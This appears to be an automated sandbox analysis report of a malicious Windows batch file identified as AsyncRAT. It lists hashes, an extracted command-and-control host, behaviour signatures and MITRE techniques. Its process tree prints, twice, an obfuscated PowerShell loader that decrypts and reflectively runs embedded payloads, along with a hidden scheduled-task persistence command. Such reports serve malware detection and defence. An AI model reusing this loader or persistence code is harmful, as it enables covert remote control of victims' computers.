Overview

overview

10

Static

static

1

54M9lg5.bat

windows7-x64

8

54M9lg5.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-06-2024 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    54M9lg5.bat

  • Size

    388KB

  • MD5

    31cebd7e588526ab0e13b91877c08665

  • SHA1

    52929c1bd8765d5573848494d880bf2484acac12

  • SHA256

    fb199c109cc8551b14ce74fc759e7e2430f7f5a57cd410ac8cdb5cb894bbfeb8

  • SHA512

    64b35bead23bf5310cd3afb7de4504dc67911ed6e9b9c4a3aaf106505e081657f8da3f3444e6b74c1e9744f9dd1b4646b27c35d05f6af2b7614aecb251a9bf61

  • SSDEEP

    12288:yX/PIvkGjjGp/BqbaywxRYCXEP2+oeUwG1GKp:QPIcGjjkEwxRYCX42Thp

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

instruments-toxic.gl.at.ply.gg:14761

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:796
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:904
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:392
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
              1⤵
                PID:1056
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1080
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1112
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1128
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1144
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1268
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1296
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1332
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1400
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1412
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1536
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1548
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1608
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1700
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1744
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1804
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1816
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:2024
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2032
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1392
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                      PID:1544
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2064
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                        1⤵
                                                          PID:2220
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2248
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2268
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2580
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2652
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2660
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                      PID:2716
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                      • Enumerates connected drives
                                                                      PID:2752
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                      1⤵
                                                                        PID:2792
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2864
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2888
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3428
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3572
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4852
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f3MdSQvZVMcn6E7f4B+XvVgVp1iwF8nc01VvmvGOU0U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMZBwLm+KLwTB8FTX+suaA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DtgGd=New-Object System.IO.MemoryStream(,$param_var); $UJAmf=New-Object System.IO.MemoryStream; $NciVC=New-Object System.IO.Compression.GZipStream($DtgGd, [IO.Compression.CompressionMode]::Decompress); $NciVC.CopyTo($UJAmf); $NciVC.Dispose(); $DtgGd.Dispose(); $UJAmf.Dispose(); $UJAmf.ToArray();}function execute_function($param_var,$param2_var){ $QoXwT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GTccN=$QoXwT.EntryPoint; $GTccN.Invoke($null, $param2_var);}$jYuiO = 'C:\Users\Admin\AppData\Local\Temp\54M9lg5.bat';$host.UI.RawUI.WindowTitle = $jYuiO;$gXwGM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jYuiO).Split([Environment]::NewLine);foreach ($LLKpG in $gXwGM) { if ($LLKpG.StartsWith('icuYuBCnSxMVygOBoHMo')) { $vmoAo=$LLKpG.Substring(20); break; }}$payloads_var=[string[]]$vmoAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                  3⤵
                                                                                    PID:4692
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                    3⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4616
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1324
                                                                                    • C:\Windows\System32\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbs"
                                                                                      4⤵
                                                                                      • Checks computer location settings
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1496
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.bat" "
                                                                                        5⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4676
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f3MdSQvZVMcn6E7f4B+XvVgVp1iwF8nc01VvmvGOU0U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tMZBwLm+KLwTB8FTX+suaA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DtgGd=New-Object System.IO.MemoryStream(,$param_var); $UJAmf=New-Object System.IO.MemoryStream; $NciVC=New-Object System.IO.Compression.GZipStream($DtgGd, [IO.Compression.CompressionMode]::Decompress); $NciVC.CopyTo($UJAmf); $NciVC.Dispose(); $DtgGd.Dispose(); $UJAmf.Dispose(); $UJAmf.ToArray();}function execute_function($param_var,$param2_var){ $QoXwT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GTccN=$QoXwT.EntryPoint; $GTccN.Invoke($null, $param2_var);}$jYuiO = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.bat';$host.UI.RawUI.WindowTitle = $jYuiO;$gXwGM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jYuiO).Split([Environment]::NewLine);foreach ($LLKpG in $gXwGM) { if ($LLKpG.StartsWith('icuYuBCnSxMVygOBoHMo')) { $vmoAo=$LLKpG.Substring(20); break; }}$payloads_var=[string[]]$vmoAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                          6⤵
                                                                                            PID:3440
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1964
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3672
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                    1⤵
                                                                                      PID:3936
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                      1⤵
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:3560
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                      1⤵
                                                                                        PID:4424
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:532
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                          1⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:2736
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                          1⤵
                                                                                            PID:4192
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                            1⤵
                                                                                              PID:3004

                                                                                            Network

                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                            Initial Access

                                                                                            Execution

                                                                                            Command and Scripting Interpreter

                                                                                            1
                                                                                            T1059

                                                                                            PowerShell

                                                                                            1
                                                                                            T1059.001

                                                                                            Persistence

                                                                                            Privilege Escalation

                                                                                            Defense Evasion

                                                                                            Credential Access

                                                                                            Discovery

                                                                                            Query Registry

                                                                                            2
                                                                                            T1012

                                                                                            System Information Discovery

                                                                                            3
                                                                                            T1082

                                                                                            Peripheral Device Discovery

                                                                                            1
                                                                                            T1120

                                                                                            Lateral Movement

                                                                                            Collection

                                                                                            Exfiltration

                                                                                            Command and Control

                                                                                            Impact

                                                                                            Resource Development

                                                                                            Reconnaissance

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                              Filesize

                                                                                              3KB

                                                                                              MD5

                                                                                              661739d384d9dfd807a089721202900b

                                                                                              SHA1

                                                                                              5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                              SHA256

                                                                                              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                              SHA512

                                                                                              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                              Download Submit
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              664dee2ab48c3453aa55cac8ecaa5a44

                                                                                              SHA1

                                                                                              9211491fa3bfb05ded40ac728c73e05ac7e2aca2

                                                                                              SHA256

                                                                                              a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953

                                                                                              SHA512

                                                                                              dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff

                                                                                              Download Submit
                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gsvoq01k.zxz.ps1
                                                                                              Filesize

                                                                                              60B

                                                                                              MD5

                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                              SHA1

                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                              SHA256

                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                              SHA512

                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                              Download Submit
                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.bat
                                                                                              Filesize

                                                                                              388KB

                                                                                              MD5

                                                                                              31cebd7e588526ab0e13b91877c08665

                                                                                              SHA1

                                                                                              52929c1bd8765d5573848494d880bf2484acac12

                                                                                              SHA256

                                                                                              fb199c109cc8551b14ce74fc759e7e2430f7f5a57cd410ac8cdb5cb894bbfeb8

                                                                                              SHA512

                                                                                              64b35bead23bf5310cd3afb7de4504dc67911ed6e9b9c4a3aaf106505e081657f8da3f3444e6b74c1e9744f9dd1b4646b27c35d05f6af2b7614aecb251a9bf61

                                                                                              Download Submit
                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_85.vbs
                                                                                              Filesize

                                                                                              123B

                                                                                              MD5

                                                                                              acd4bfc1a66491a387e68107d632e236

                                                                                              SHA1

                                                                                              355c44dc35e9f3bc4405cac3903450068cf96fc1

                                                                                              SHA256

                                                                                              408e3bb978e09394758b2eb3e82fb573689408cff85dba43c835bf67859b15ba

                                                                                              SHA512

                                                                                              1984ef66e14c0e9ec0d4ceb9392eab4c811f2f7e69c752abee8a7b706365762f22fd6ecb1de8852d91523bd06f77e6504247c65d14e7daeca0a82f24e34a08b0

                                                                                              Download Submit
                                                                                            • memory/392-60-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/904-108-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/952-107-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1112-115-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1296-109-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1324-32-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/1324-29-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/1324-19-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/1324-18-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/1400-114-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1412-113-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1536-69-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1544-68-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1548-63-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1744-64-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/1964-51-0x000001C5F4F40000-0x000001C5F4F56000-memory.dmp
                                                                                              Filesize

                                                                                              88KB

                                                                                              Download
                                                                                            • memory/2716-78-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/2736-62-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/2752-61-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/2792-112-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/2864-111-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/3572-53-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/3572-50-0x0000000002DF0000-0x0000000002E1A000-memory.dmp
                                                                                              Filesize

                                                                                              168KB

                                                                                              Download
                                                                                            • memory/3936-110-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                              Download
                                                                                            • memory/4616-0-0x00007FFF7C963000-0x00007FFF7C965000-memory.dmp
                                                                                              Filesize

                                                                                              8KB

                                                                                              Download
                                                                                            • memory/4616-14-0x000001FEA9F40000-0x000001FEA9FB6000-memory.dmp
                                                                                              Filesize

                                                                                              472KB

                                                                                              Download
                                                                                            • memory/4616-13-0x000001FEA9E70000-0x000001FEA9EB4000-memory.dmp
                                                                                              Filesize

                                                                                              272KB

                                                                                              Download
                                                                                            • memory/4616-12-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/4616-11-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/4616-15-0x000001FE916C0000-0x000001FE916C8000-memory.dmp
                                                                                              Filesize

                                                                                              32KB

                                                                                              Download
                                                                                            • memory/4616-52-0x00007FFF7C960000-0x00007FFF7D421000-memory.dmp
                                                                                              Filesize

                                                                                              10.8MB

                                                                                              Download
                                                                                            • memory/4616-16-0x000001FEA9830000-0x000001FEA987A000-memory.dmp
                                                                                              Filesize

                                                                                              296KB

                                                                                              Download
                                                                                            • memory/4616-10-0x000001FE91690000-0x000001FE916B2000-memory.dmp
                                                                                              Filesize

                                                                                              136KB

                                                                                              Download